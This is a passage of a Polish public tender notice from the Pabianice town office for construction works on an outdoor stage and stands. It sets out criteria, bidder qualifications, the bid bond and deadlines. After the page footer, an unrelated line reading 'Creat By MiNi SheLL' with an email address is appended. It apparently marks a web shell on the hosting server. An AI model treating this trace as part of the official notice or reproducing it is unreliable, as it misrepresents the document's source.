dokona poprawek w ofercie zgodnie z zapisami art.223 ust. 2 ustawy pzp.<br/>4. W przypadku rozbieżności pomiędzy ceną podaną<br/>przez wykonawcę w ofercie wyrażoną słownie oraz cyfrowo za prawidłową Zamawiający uzna wartość<br/>(cenę) wyrażoną słownie z zastrzeżeniem art. 223 ust. 2 pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: postępowaniu<br/>6.1.1. zdolności do występowania w obrocie gospodarczym;Zamawiający nie określa warunku w<br/>ww. zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.3. uprawnień sytuacji ekonomicznej lub finansowej;Zamawiający nie określa warunku w ww. zakresie<br/>6.1.4. zdolności technicznej lub zawodowej w zakresie:Opis sposobu dokonywania oceny spełniania tego warunku: <br/>1)Wykonawca winien wykazać, że wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co<br/>najmniej jedną robotę budowlaną o wartości minimum 1 500 000 zł brutto (słownie: jeden milion pięćset tysięcy złotych), która polegała na budowie lub przebudowie lub remoncie budowli<br/>użyteczności publicznej, zawierającej minimum roboty dotyczące sceny zewnętrznej i/lub widowni i/lub trybun, wraz z infrastrukturą towarzyszącą, z zastrzeżeniem, że ilość stałych miejsc siedzących w tym obiekcie to minimum 300.<br/>2) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji:a) min. jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno– budowlanej, których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania<br/>robotami równoważne do wyżej wskazanych.b) min. jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznej których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia lub<br/>odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych.<br/>DODATKOWE<br/>INFORMACJE DOTYCZĄCE WARUNKÓW UDZIAŁU W POSTĘPOWANIU:1) Wykonawca<br/>powinien w wykazie robót wyraźnie określić zakres i wartość oraz zakres robót, aby można było ustalić, czy spełnia warunek udziału w postępowaniu.1) Wartości podane w dokumentach w<br/>walutach innych niż wskazane przez Zamawiającego będą przeliczane wg średniego kursu NBP nadzień publikacji ogłoszenia.2) Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji<br/>zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w<br/>rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane(t. j. Dz. U. 2020 r, poz. 1333<br/>z późn. zm.) oraz przepisów wcześniejszych.Samodzielne funkcje techniczne w budownictwie<br/>(nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami<br/>regulującymi nadawanie uprawnień budowlanych w dacie ich nadania.3) Wykonawca w celu<br/>wykazania spełniania warunków określonych w pkt 6.1.4, ppkt 2) SWZ może wskazać osobę<br/>będącą obywatelem państwa członkowskiego UE, która nabyła kwalifikacje zawodowe do<br/>wykonywania działalności w budownictwie, równoznaczne wykonywaniu samodzielnych funkcji<br/>technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej – zgodnie z właściwym i<br/>przepisami, w szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z<br/>2020 r., poz. 220) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych<br/>architektów oraz inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117).6.2. Zamawiający może,<br/>oceniając zdolność techniczną lub zawodową, na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę<br/>sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć<br/>negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art. 116 ust. 2<br/>ustawy Pzp).6.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>wykazując warunek udziału w postępowaniu mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane6.4. Sposób wykazania warunków udziału<br/>w postępowaniu wskazano w rozdziale 8 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">8.1. Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia stanowiące wstępne<br/>potwierdzenie, że Wykonawca na dzień składania ofert:a) nie podlega wykluczeniu,b) spełnia warunki<br/>udziału w postępowaniu.<br/>8.1.1. Oświadczenia należy złożyć wg wymogów załącznika nr 4 i 5 do<br/>SWZ.<br/>8.1.2. Jeżeli Wykonawca nie złożył oświadczeń, o którym mowa w pkt 8.1 SWZ lub są one<br/>niekompletne lub zawierają błędy, Zamawiający wezwie Wykonawcę odpowiednio do ich złożenia,<br/>poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że oferta Wykonawcy podlega<br/>odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki<br/>unieważnienia postępowania.<br/>8.1.3. Złożenie, uzupełnienie lub poprawienie oświadczeń, o którym mowa w pkt 8.1SWZ nie może<br/>służyć potwierdzeniu spełniania kryteriów selekcji.<br/>8.1.4. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych oświadczeń,<br/>o których mowa w pkt 8.1 SWZ.<br/>8.1.5. Jeżeli złożone przez Wykonawcę oświadczenia, o którym mowa w<br/>pkt 8.1 SWZ budzą wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który<br/>jest w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny spełniania przez Wykonawcę warunków udziału w postępowaniu, kryteriów selekcji lub braku podstaw wykluczenia,<br/>o przedstawienie takich informacji lub dokumentów. 8.2. W przypadku, o którym mowa w rozdziale 6.3<br/>SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika,które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>8.2.1.Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ.<br/>8.2.2. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>8.3.2. W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu:Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia<br/>wezwania)następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>8.3.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu:a) wykazu robót<br/>budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane(sporządzonego zgodnie z<br/>Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne<br/>odpowiednie<br/>dokumenty – w odniesieniu do warunku określonego w pkt.6.1.4. ppkt. 1) SWZ,b) wykazu osób,<br/>skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług,kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień,doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z<br/>Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2) SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy<br/>czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować<br/>dane wymagane dla oferty w SWZ i załącznikach).<br/>2) Oświadczenia, o których mowa w rozdziale 8.1 SWZ;<br/>3)Oświadczenie, o którym mowa w rozdziale 8.2 SWZ (jeżeli dotyczy),<br/>4) Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy).<br/>5) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby: a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu<br/>Wykonawcy lub podmiotu udostępniającego<br/>zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub<br/>informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru;b) Wykonawca lub podmiot udostępniający zasoby<br/>nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli Zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca<br/>wskazał<br/>dane umożliwiające dostęp do tych dokumentów.c) jeżeli w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika<br/>z dokumentów,o których mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu<br/>udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/>6) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 12.1. Wykonawca jest zobowiązany wnieść wadium w wysokości: 20 000 PLN (słownie<br/>dwadzieścia tysięcy złotych),<br/>12.1. Wadium może być wniesione w jednej lub kilku następujących<br/>formach: a) pieniądzu; b) gwarancjach bankowych;c) gwarancjach<br/>ubezpieczeniowych;d)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5<br/>pkt. 2ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości.<br/>12.2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek<br/>bankowy Zamawiającego:GETIN BANK Nr rachunku: 47 1560 0013 2473 5210 8000 0006z<br/>adnotacją „Wadium – Znak sprawy: ZP.271.5.2021 ”Za skuteczne wniesienie wadium w<br/>pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym<br/>Zamawiającego przed upływem terminu składania ofert.<br/>12.3. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem<br/>terminu składania ofert.<br/>12.4. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub<br/>poręczenia gwarancja lub poręczenie musi być nieodwołalne,bezwarunkowe i płatne na<br/>pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i<br/>powinna zawierać następujące elementy: a) nazwę: dającego zlecenie (Wykonawcy),<br/>beneficjenta gwarancji/poręczenia(Zamawiającego), gwaranta lub poręczyciela oraz wskazanie<br/>ich siedzib, b)kwotę wadium, c) termin ważności gwarancji/poręczenia w formule: „od dnia<br/>…….– do dnia ………”, d) zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej<br/>w gwarancji/poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium<br/>określonych w przepisach ustawy.<br/>12.5. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nie przerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>12.6. Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:a)<br/>oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.b) w<br/>przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie,z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć<br/>wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem<br/>dowodowym.c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki<br/>dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których<br/>mowa w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku.<br/>10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały wskazane w projekcie umowy stanowiącym załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-18 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy do sekcji III pkt. 3.6) ogłoszenia: 11.12. Jeżeli dokumenty elektroniczne,<br/>przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje<br/>stanowiącetajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993<br/>r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca w celu<br/>utrzymania ich w poufności, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz<br/>z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”, a<br/>następnie z plikami stanowiącymi jawną część należy ten plik zaszyfrować.11.13. Do oferty<br/>należy dołączyć oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu lub kryteriów selekcji, w zakresie wskazanym w pkt 8.1 SWZ w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisemosobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę.11.14. Oferta może być złożona tylko do upływu terminu składania ofert.11.15. Wykonawca może przed<br/>upływem terminu do składania ofert wycofać ofertę za pośrednictwem „Formularza do złożenia,<br/>zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na<br/>miniPortalu. Sposób wycofania oferty został opisany w „Instrukcji użytkownika” dostępnej na<br/>miniPortalu. 11.16. Wykonawca po upływie terminu do składania ofert nie może skutecznie<br/>dokonać zmiany ani wycofać złożonej oferty.11.17. Komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami w zakresie składania dokumentów, oświadczeń, wniosków (innych niż ofertktóre<br/>mogą być przekazywane jedynie w sposób wskazany w pkt 11.8 odbywa się elektronicznie<br/>za pośrednictwem:a) dedykowanego formularza:<br/>„Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal;<br/>(dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza<br/>do komunikacji” jako załącznik b) poczty elektronicznej na adres poczty Zamawiającego:<br/>zamowienia.publiczne@um.pabianice.pl (dopuszcza się składanie dokumentów elektronicznych<br/>za<br/>pomocą poczty elektronicznej). Zamawiający przekazuje dokumenty na adres poczty elektronicznej wskazany w formularzu ofertowym Wykonawcy, na co Wykonawca wyraża zgodę<br/>wskazując ten adres w ofercie i zobowiązuje się do utrzymania jego funkcjonalności przez czas<br/>trwania postępowania. Domniemywa się, że dokumenty, oświadczenia i wnioski przekazane na adres poczty elektronicznej wskazany w formularzu ofertowym zostały doręczone skutecznie, a Wykonawca zapoznał się z ich treścią.<br/>Wszystkie szczegółowe informacje w SWZ opublikowanym na stronie postępowania https://www.bip.um.pabianice.pl</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com